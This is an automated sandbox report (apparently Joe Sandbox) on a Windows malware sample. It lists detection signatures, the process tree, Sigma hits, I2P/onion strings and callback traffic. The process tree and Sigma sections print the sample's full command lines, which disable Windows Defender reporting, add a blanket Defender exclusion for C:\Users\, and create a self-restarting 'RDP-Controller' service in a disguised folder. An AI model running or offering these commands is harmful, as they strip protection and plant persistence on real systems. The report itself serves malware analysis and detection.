Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1531723
MD5:	31d649663149dabd99c51b71e60a4a91
SHA1:	f5f515e1818388c9360bde15a7dfcb265e86a812
SHA256:	2acb9052db5b304a822f8cd1169e31327e967e06ff78064997ea8a5003e783ec
Tags:	exeuser-Bitsight
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)

Multi AV Scanner detection for dropped file

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Connects to many ports of the same IP (likely port scanning)

Contains functionality to hide user accounts

Found Tor onion address

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Modifies Windows Defender protection settings

NDIS Filter Driver detected (likely used to intercept and sniff network traffic)

Sigma detected: Execution from Suspicious Folder

Sigma detected: Potentially Suspicious Malware Callback Communication

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspicious New Service Creation

Sigma detected: Suspicious Program Location with Network Connections

AV process strings found (often used to terminate AV products)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Connects to several IPs in different countries

Contains functionality to call native functions

Contains functionality to create new users

Contains functionality to dynamically determine API calls

Contains functionality to enumerate network shares

Contains functionality to enumerate running services

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query network adapater information

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Enables security privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries keyboard layouts

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Classification

Process Tree

System is w10x64

file.exe (PID: 7096 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 31D649663149DABD99C51B71E60A4A91)

file.exe (PID: 5232 cmdline: C:\Users\user\Desktop\file.exe MD5: 31D649663149DABD99C51B71E60A4A91)

cmd.exe (PID: 6452 cmdline: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\7mmwpep245voy3fngkym99px3pj5vx36.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5592 cmdline: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 2656 cmdline: powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 7124 cmdline: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'" MD5: 04029E121A0CFA5991749937DD22A1D9)

cwjk513wjc7a1mlgh3.exe (PID: 560 cmdline: "C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe" MD5: 319865D78CC8DF6270E27521B8182BFF)

73tsjpnle0jv48sgryqfs6ph8t.exe (PID: 6248 cmdline: "C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe" MD5: 7D1755E8E41A6C2F08D2FAEFFDF9DAD1)

taskkill.exe (PID: 5600 cmdline: taskkill.exe /F /FI "SERVICES eq RDP-Controller" MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 3900 cmdline: sc.exe stop RDP-Controller MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 4192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 600 cmdline: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 3928 cmdline: sc.exe failure RDP-Controller reset= 1 actions= restart/10000 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 1868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 6756 cmdline: sc.exe start RDP-Controller MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 5408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

icacls.exe (PID: 6876 cmdline: icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18 MD5: 48C87E3B3003A2413D6399EA77707F5D)

conhost.exe (PID: 1712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

icacls.exe (PID: 5800 cmdline: icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\95cRhCj4pPDP.acl MD5: 48C87E3B3003A2413D6399EA77707F5D)

conhost.exe (PID: 5216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

main.exe (PID: 2656 cmdline: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe MD5: 4E320E2F46342D6D4657D2ADBF1F22D0)

WerFault.exe (PID: 4556 cmdline: C:\Windows\system32\WerFault.exe -u -p 2656 -s 1188 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

svchost.exe (PID: 3672 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WerFault.exe (PID: 5268 cmdline: C:\Windows\system32\WerFault.exe -pss -s 444 -p 2656 -ip 2656 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

main.exe (PID: 2256 cmdline: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe MD5: 4E320E2F46342D6D4657D2ADBF1F22D0)

cleanup

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, CommandLine: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, NewProcessName: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, OriginalFileName: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5268, ProcessCommandLine: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, ProcessId: 2656, ProcessName: main.exe

Sigma detected: Potentially Suspicious Malware Callback Communication

Source: Network Connection

Author: Florian Roth (Nextron Systems): Data: DestinationIp: 23.128.248.23, DestinationIsIpv6: false, DestinationPort: 7777, EventID: 3, Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, Initiated: true, ProcessId: 2256, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 9195

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\7mmwpep245voy3fngkym99px3pj5vx36.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6452, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", ProcessId: 5592, ProcessName: powershell.exe

Sigma detected: Suspicious New Service Creation

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe, ParentProcessId: 6248, ParentProcessName: 73tsjpnle0jv48sgryqfs6ph8t.exe, ProcessCommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, ProcessId: 600, ProcessName: sc.exe

Sigma detected: Suspicious Program Location with Network Connections

Source: Network Connection

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 23.137.250.108, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, Initiated: true, ProcessId: 2656, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49755

Sigma detected: Powershell Defender Exclusion

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", CommandLine: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\7mmwpep245voy3fngkym99px3pj5vx36.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6452, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", ProcessId: 7124, ProcessName: powershell.exe

Sigma detected: New Service Creation Using Sc.EXE

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe, ParentProcessId: 6248, ParentProcessName: 73tsjpnle0jv48sgryqfs6ph8t.exe, ProcessCommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, ProcessId: 600, ProcessName: sc.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\7mmwpep245voy3fngkym99px3pj5vx36.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6452, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", ProcessId: 5592, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 3672, ProcessName: svchost.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe	ReversingLabs: Detection: 41%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe

Joe Sandbox ML: detected

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.2770000.1.unpack

Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe

File created: C:\Users\user\AppData\Local\Temp\installer.log

Jump to behavior

Source:	Binary string: RfxVmt.pdb source: 73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, Cw0MZxef.23.dr, rfxvmt.dll.23.dr
Source:	Binary string: RfxVmt.pdbGCTL source: 73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, Cw0MZxef.23.dr, rfxvmt.dll.23.dr

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11506DA3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,	23_2_00007FFE11506DA3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11506D5F NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,	23_2_00007FFE11506D5F
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE11776D5F NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,	32_2_00007FFE11776D5F
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE11776DA3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,	32_2_00007FFE11776DA3

Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe	Code function: 5_2_00007FF64B933DB3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	5_2_00007FF64B933DB3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FF7C1AB47A3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FF7C1AB47A3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE1150A083 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFE1150A083
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11BD1883 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFE11BD1883
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11EC5BF3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFE11EC5BF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE126E57B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFE126E57B3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE1A4F5203 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFE1A4F5203
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE1A522FE3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFE1A522FE3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE1177A083 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	32_2_00007FFE1177A083

Networking

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 217.255.81.237 ports 0,1,3,5,7,10753
Source: global traffic	TCP traffic: 173.68.123.78 ports 0,2,3,4,5,25043
Source: global traffic	TCP traffic: 77.54.240.255 ports 14290,0,1,2,4,9

Found Tor onion address

Source: 73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,ht
Source: main.exe, 00000017.00000002.2668148330.00000157C5EC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.onion.im/
Source: main.exe, 00000017.00000002.2668148330.00000157C5EC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.onion.im/O
Source: main.exe, 00000017.00000002.2669826636.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000017.00000002.2668148330.00000157C5E3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,ht
Source: main.exe, 00000020.00000003.2796330606.00000142D8DAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Onion-Location: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
Source: main.exe, 00000020.00000003.2796297665.00000142D8DD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Onion-Location: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
Source: main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.onion.im/
Source: main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.onion.im/w
Source: main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000020.00000003.2796330606.00000142D8DA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Onion-Location: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
Source: 6rRRlGVV.23.dr	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/

NDIS Filter Driver detected (likely used to intercept and sniff network traffic)

Source: cwjk513wjc7a1mlgh3.exe.1.dr

Static PE information: Found NDIS imports: FwpmEngineClose0, FwpmEngineOpen0, FwpmFilterAdd0, FwpmFilterDeleteByKey0, FwpmFreeMemory0, FwpmProviderAdd0, FwpmProviderCreateEnumHandle0, FwpmProviderDestroyEnumHandle0, FwpmProviderEnum0

Source: unknown

Network traffic detected: IP country count 14

Source: global traffic	TCP traffic: 192.168.2.4:49730 -> 146.70.24.213:1125
Source: global traffic	TCP traffic: 192.168.2.4:49780 -> 91.149.236.241:26270
Source: global traffic	TCP traffic: 192.168.2.4:49781 -> 124.169.148.215:37472
Source: global traffic	TCP traffic: 192.168.2.4:49782 -> 77.54.240.255:14290
Source: global traffic	TCP traffic: 192.168.2.4:49792 -> 23.137.249.66:9520
Source: global traffic	TCP traffic: 192.168.2.4:49793 -> 217.255.81.237:10753
Source: global traffic	TCP traffic: 192.168.2.4:49794 -> 173.68.123.78:25043
Source: global traffic	TCP traffic: 192.168.2.4:49795 -> 80.46.94.241:9823
Source: global traffic	TCP traffic: 192.168.2.4:49801 -> 99.174.64.226:9448
Source: global traffic	TCP traffic: 192.168.2.4:50034 -> 50.100.197.208:11811
Source: global traffic	TCP traffic: 192.168.2.4:50039 -> 173.47.97.119:21732
Source: global traffic	UDP traffic: 192.168.2.4:28204 -> 151.242.80.51:29738
Source: global traffic	UDP traffic: 192.168.2.4:28204 -> 2.191.228.230:27119
Source: global traffic	UDP traffic: 192.168.2.4:28204 -> 85.236.190.252:13148
Source: global traffic	UDP traffic: 192.168.2.4:28204 -> 87.225.96.167:11115
Source: global traffic	UDP traffic: 192.168.2.4:28204 -> 2.178.241.192:9696
Source: global traffic	UDP traffic: 192.168.2.4:28204 -> 95.68.156.35:20185
Source: global traffic	UDP traffic: 192.168.2.4:28204 -> 83.255.145.146:20666
Source: global traffic	UDP traffic: 192.168.2.4:28204 -> 82.38.134.93:12701
Source: global traffic	UDP traffic: 192.168.2.4:28204 -> 62.210.85.80:17893
Source: global traffic	UDP traffic: 192.168.2.4:9195 -> 45.30.192.252:9368
Source: global traffic	UDP traffic: 192.168.2.4:9195 -> 45.126.126.80:13092
Source: global traffic	UDP traffic: 192.168.2.4:9195 -> 23.128.248.23:7777
Source: global traffic	UDP traffic: 192.168.2.4:9195 -> 89.87.222.219:21603

Source: Joe Sandbox View

ASN Name: ASN-METANETRoutingpeeringissuesnocmetanetchCH ASN-METANETRoutingpeeringissuesnocmetanetchCH

Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
